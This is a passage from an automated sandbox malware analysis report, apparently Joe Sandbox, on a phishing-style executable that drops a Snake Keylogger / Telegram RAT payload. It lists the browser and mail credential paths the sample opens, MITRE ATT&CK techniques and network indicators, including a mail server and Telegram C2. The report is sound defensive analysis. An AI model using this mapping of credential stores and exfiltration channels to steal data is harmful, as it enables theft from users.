          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Undismembered.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeCode function: 0_2_0040322B EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040322B
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected Snake Keylogger
          Source: Yara matchFile source: 0000000A.00000002.2495516741.0000000020581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Yara detected Telegram RAT
          Source: Yara matchFile source: Process Memory Space: Undismembered.exe PID: 7924, type: MEMORYSTR
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: Yara matchFile source: Process Memory Space: Undismembered.exe PID: 7924, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected Snake Keylogger
          Source: Yara matchFile source: 0000000A.00000002.2495516741.0000000020581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Yara detected Telegram RAT
          Source: Yara matchFile source: Process Memory Space: Undismembered.exe PID: 7924, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Windows Management Instrumentation          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Disable or Modify Tools          		1
          OS Credential Dumping          		4
          File and Directory Discovery          		Remote Services1
          Archive Collected Data          		1
          Web Service          		Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          PowerShell          		Boot or Logon Initialization Scripts1
          Access Token Manipulation          		2
          Obfuscated Files or Information          		LSASS Memory116
          System Information Discovery          		Remote Desktop Protocol1
          Data from Local System          		3
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)311
          Process Injection          		1
          Software Packing          		Security Account Manager21
          Security Software Discovery          		SMB/Windows Admin Shares1
          Email Collection          		21
          Encrypted Channel          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          DLL Side-Loading          		NTDS1
          Process Discovery          		Distributed Component Object Model1
          Clipboard Data          		1
          Non-Standard Port          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Masquerading          		LSA Secrets31
          Virtualization/Sandbox Evasion          		SSHKeylogging3
          Non-Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
          Virtualization/Sandbox Evasion          		Cached Domain Credentials1
          Application Window Discovery          		VNCGUI Input Capture24
          Application Layer Protocol          		Data Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Access Token Manipulation          		DCSync1
          System Network Configuration Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
          Process Injection          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1633323 Sample: URGENTE Ref.exe Startdate: 10/03/2025 Architecture: WINDOWS Score: 100 27 reallyfreegeoip.org 2->27 29 api.telegram.org 2->29 31 5 other IPs or domains 2->31 47 Suricata IDS alerts for network traffic 2->47 49 Found malware configuration 2->49 51 Multi AV Scanner detection for submitted file 2->51 57 4 other signatures 2->57 8 URGENTE Ref.exe 1 41 2->8         started        signatures3 53 Tries to detect the country of the analysis system (by using the IP) 27->53 55 Uses the Telegram API (likely for C&C communication) 29->55 process4 file5 21 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 8->21 dropped 11 powershell.exe 30 8->11         started        process6 file7 23 C:\Users\user\AppData\...\Undismembered.exe, PE32 11->23 dropped 25 C:\...\Undismembered.exe:Zone.Identifier, ASCII 11->25 dropped 59 Early bird code injection technique detected 11->59 61 Writes to foreign memory regions 11->61 63 Found suspicious powershell code related to unpacking or dynamic code loading 11->63 65 3 other signatures 11->65 15 Undismembered.exe 15 8 11->15         started        19 conhost.exe 11->19         started        signatures8 process9 dnsIp10 33 mail.bsp.com.es 82.98.167.108, 587, 63196 DINAHOSTING-ASES Spain 15->33 35 checkip.dyndns.com 132.226.8.169, 49700, 49703, 49705 UTMEMUS United States 15->35 37 4 other IPs or domains 15->37 39 Multi AV Scanner detection for dropped file 15->39 41 Tries to steal Mail credentials (via file / registry access) 15->41 43 Tries to harvest and steal browser information (history, passwords, etc) 15->43 45 Switches to a custom stack to bypass stack traces 15->45 signatures11

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.